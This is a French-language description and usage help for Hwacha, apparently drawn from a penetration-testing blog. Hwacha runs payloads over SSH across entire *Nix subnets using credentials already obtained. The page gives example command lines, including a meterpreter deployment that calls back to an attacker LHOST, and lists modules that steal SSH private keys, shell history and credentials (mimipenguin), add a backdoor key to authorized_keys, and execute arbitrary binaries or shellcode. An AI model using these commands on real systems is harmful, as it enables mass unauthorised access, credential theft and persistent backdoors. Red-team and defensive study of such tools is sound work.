
Déployer des payloads sur des systèmes *Nix en masse.

https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/
Hwacha est un outil permettant d'exécuter rapidement des charges utiles (payloads) sur des systèmes basés sur *Nix. Il permet de collecter facilement des artefacts ou d'exécuter du shellcode sur un sous-réseau entier de systèmes pour lesquels des identifiants ont été obtenus.
$python hwacha.py
&&&& && && &&
&&&&&&&&&&&& && && && Created by Esteban Rodriguez /~~\_
&&&&&& && &&&&&&&&&& && Web: https://www.n00py.io /| '` *\
&& && &&&&& && &&&&& Twitter: @n00py1 \| ___/
&& && &&&&& && && &&&&& _ _ _
&& && && && && && | | | | | |
&&&&&& && &&& &&& && | |_| |__ ____ _ ___| |__ __ _
&& && && && && | _ |\ \ /\ / / _` |/ __| '_ \ / _` |
&&&&&&&&&&&&&&& && | | | | \ V V / (_| | (__| | | | (_| |
&& && \_| |_/ \_/\_/ \__,_|\___|_| |_|\__,_|
Pour exécuter des commandes, utilisez -x [COMMANDE]
pour exécuter des modules, utilisez -m [MODULE]
pour spécifier les options du module, utilisez -o [ARG=ARG ARG=ARG]
pour voir tous les modules disponibles, utilisez -L
Exemples d'utilisation :
python hwacha.py -t 192.168.1.1/24 -u admin -p password
python hwacha.py -t 192.168.1.100-200 -u admin -p password -m keys
python hwacha.py -t 192.168.1.100-200 -u admin -i loot/keys/192.168.1.101/id_rsa -x id
python hwacha.py -t 192.168.1.123 -u admin -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"
Modules disponibles :
[*] meterpreter Utilisez ce module pour exécuter un agent meterpreter sur la ou les cibles.
ARGUMENTS OBLIGATOIRES : LHOST , LPORT
ARGUMENTS OPTIONNELS : TYPE {python, php, 32, 64, osx}
[*] mimipenguin Utilisez ce module pour exécuter mimipenguin sur la ou les cibles afin de récupérer les identifiants. (Nécessite root)
ARGUMENTS OPTIONNELS : LISTEN
[*] keys Utilisez ce module pour collecter les clés privées SSH depuis la ou les cibles.
[*] history Utilisez ce module pour collecter les fichiers d'historique du shell depuis la ou les cibles.
[*] privs Utilisez ce module pour énumérer les privilèges sudo sur la ou les cibles.
[*] backdoor Crée une paire de clés RSA et ajoute la clé publique au fichier authorized_keys sur la ou les cibles.
[*] web_delivery Utilisez ce module pour exécuter un script Python sur la ou les cibles.
ARGUMENTS OBLIGATOIRES : PATH
ARGUMENTS OPTIONNELS : LISTEN
[*] custom_bin Utilisez ce module pour exécuter un binaire personnalisé sur la ou les cibles.
ARGUMENTS OBLIGATOIRES : PATH
[*] sudo_exec Utilisez ce module pour exécuter un binaire personnalisé (avec sudo) sur la ou les cibles.
ARGUMENTS OBLIGATOIRES : PATH
[*] shellcode Utilisez ce module pour exécuter un shellcode personnalisé sur la ou les cibles.
ARGUMENTS OBLIGATOIRES : PATH
Nécessite paramiko :
pip install paramiko